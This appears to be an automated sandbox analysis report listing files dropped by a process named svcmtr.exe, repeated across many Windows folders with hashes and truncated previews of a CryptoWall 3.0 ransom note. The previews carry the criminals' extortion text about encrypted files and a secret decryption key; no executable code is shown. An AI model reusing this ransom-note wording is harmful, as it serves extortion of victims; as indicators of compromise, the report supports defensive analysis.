                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Oracle\Java\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Oracle\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Oracle\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Package Cache\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Package Cache\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Adobe\ARM\Reader_19.010.20098\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Adobe\ARM\Reader_19.010.20098\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Adobe\ARM\S\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Adobe\ARM\S\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Adobe\ARM\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Adobe\ARM\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
